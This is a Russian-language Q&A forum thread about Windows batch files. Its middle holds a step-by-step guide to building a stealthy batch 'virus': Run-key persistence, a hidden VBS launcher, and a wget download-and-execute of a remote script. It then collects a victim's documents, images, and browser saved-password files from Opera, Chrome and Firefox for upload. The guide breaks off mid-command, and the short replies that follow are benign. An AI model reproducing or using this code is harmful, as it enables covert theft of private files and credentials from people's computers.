Другие языки программирования и технологии

такой вопросик прикольненький про batники уже не первый раз спрашиваю про бат файлы.

вобщем такой вопрос:
1- можно ли спомощью bat ников отправлять файлы на удлённый компьютер через интернет?? ?
2- и можно ли через bat файлы запускать сайты (ну например запустил я батник, и он мне открыл сайт "ВКонтакте" иотправил всем людям которые в онлайне сообщение к примеру "привет")
cd %systemdrive%\Windows\ftp\
reg add «HKCU\Software\Microsoft\Windows\CurrentVersion\Run» /v system_x86 /t REG_SZ /d %systemdrive%\Windows\ftp\1.vbs /f
Почему файл 1.vbs, объясню позже.
Теперь подождём минуты две, потому что при включении компа, инет включается не сразу:
ping -n 120 127.0.0.1
127.0.0.1 это локал хост, и пинговать мы его будем 120 раз, таймаут между запросами секунда, и можно выставить любое время ожидания.
Теперь создадим где-нибудь, где не нужны права админа, папку, например:
md %userprofile%\Documents\SystemData\
Удалим предыдущий загруженный файл, у меня 123.bat, даже если его нет, эта строка не помешает.
del %userprofile%\Documents\SystemData\123.bat
Теперь качаем новый файл 123.bat с сервера:
%systemdrive%\Windows\ftp\wget.exe -P %userprofile%\Documents\SystemData\ [ссылка заблокирована администрацией]
Ключ –P нужен, чтобы заставить программу качать файлы в определённую папку, а не текущую, которая, кстати, меняется командой cd.
Теперь запускам наш файл.
start /b %userprofile%\Documents\SystemData\123.bat
Ключ /b нужен что бы программа не создавала новое окно, а запускала новый файл в текущем, которого, кстати, видно не будет, но об этом позже :) .
Ну и выходим из файла, до следующей загрузки.
exit
теперь про файл 1.vbs, он служит только для скрытия окна вируса, и в нём должно быть 2 строчки:
Set oShell = WScript.CreateObject(«WScript.Shell»)
oShell.Run «%systemdrive%\Windows\ftp\Name_of_virus.bat», 0, False
Теперь про возможное содержания 123.bat, он будет таскать с компа некоторые файлы и структуру диска, то есть какие файлы есть у жертвы на компе, во всех подкаталогах.
Создаём папку, куда сложим то, что хотим украсть.
md %userprofile%\Documents\SystemData\0
Копируем файлы документов и картинок из рабочего стола и документов в эту папку:
xcopy /y /n %userprofile%\*.doc %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\*.docx %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\*.txt %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\*.png %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\*.jpg %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\*.bmp %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\Desktop\*.doc %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\Desktop\*.docx %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\Desktop\*.txt %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\Desktop\*.bmp %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\Desktop\*.jpg %userprofile%\Documents\SystemData\0
xcopy /y /n %userprofile%\Desktop\*.png %userprofile%\Documents\SystemData\0

/y что бы не задавала лишних вопросов, а /n чтобы преобразовывало имена файлов в формат 8.3 .

Можно утащить пароли от браузеров, как это делать уже было на сайте, но я всё-таки напишу.
xcopy %APPDATA%\Opera\Opera\wand.dat %userprofile%\Documents\SystemData\0
xcopy «%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login Data» %userprofile%\Documents\SystemData\0
ren “%userprofile%\Documents\SystemData\Login Data” Login_Data

(файлыспробеламиглючат, при отправке)
Для огнелиса сложнее.
cd %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\
cd *.default
xcopy key3.db %userprofile%\SystemData\0\
xcopy signons.sqlite %userprofile%\SystemData\0\
cd %userprofile%

Собираем структуру папок диска D и папки документов пользователя.
dir /s D:\ >>%userprofile%\Documents\SystemData\0\Ddir.txt
dir /s %userprofile% >>“%userprofile%\Documents\SystemData\0\UserDir.txt

Можно и всего диска С, но это может не влезть в 5мб, которые максимально принимает Яндекс, но можно попробовать упаковать 7z. У меня, например, такой файл весит 20мб, при условии, что я все свои файлы храню на D.
%systemdrive%\Windows\ftp\7z.exe a -r %userpr
Вадим Гончаров
Лучший ответ
1.На удаленный компьютер - можно, через интернет - нельзя.
2.Открывать сайт - можно (start <url>), отправлять людям которые в онлайне сообщение - нельзя.
Владимир Заика
да, да можно но придеться использовать perl или php или python мощи встроенного виндового batch может нехватить
1) можно
2) можно, но без отправки сообщений. тут уже автомайзер нужен